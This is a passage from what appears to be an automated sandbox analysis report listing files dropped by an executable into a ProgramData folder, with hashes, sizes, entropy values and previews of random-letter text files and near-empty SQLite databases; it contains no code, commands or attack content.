SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\ProgramData\AFIDGDBGCAAF\ECBKKK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\ProgramData\AFIDGDBGCAAF\EGDGIE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\ProgramData\AFIDGDBGCAAF\EHDAFI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702263764575455
Encrypted:	false
SSDEEP:	24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
MD5:	1680F18135FD9FE517865D4B70BCA69F
SHA1:	CE72CFB81AB690709C2C5BBF40348F829C87813B
SHA-256:	0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
SHA-512:	E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
Malicious:	false
Preview:	ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

C:\ProgramData\AFIDGDBGCAAF\EHIDAK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\ProgramData\AFIDGDBGCAAF\FBAFII

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6980379859154695
Encrypted:	false
SSDEEP:	24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:	4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:	C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:	59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:	DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:	false
Preview:	QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

C:\ProgramData\AFIDGDBGCAAF\FBKJDG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\ProgramData\AFIDGDBGCAAF\FCGIJK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6980379859154695
Encrypted:	false
SSDEEP:	24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:	4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:	C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:	59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:	DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:	false
Preview:	QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

C:\ProgramData\AFIDGDBGCAAF\FHCAFI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\ProgramData\AFIDGDBGCAAF\FHIDAKFIJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFIDGDBGCAAF\FHJDBK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFIDGDBGCAAF\FIIEHJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702247102869977
Encrypted:	false
SSDEEP:	24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5:	B734D7226D90E4FD8228EE89C7DD26DA
SHA1:	EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:	ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:	D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:	false
Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\ProgramData\AFIDGDBGCAAF\GCBKFI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
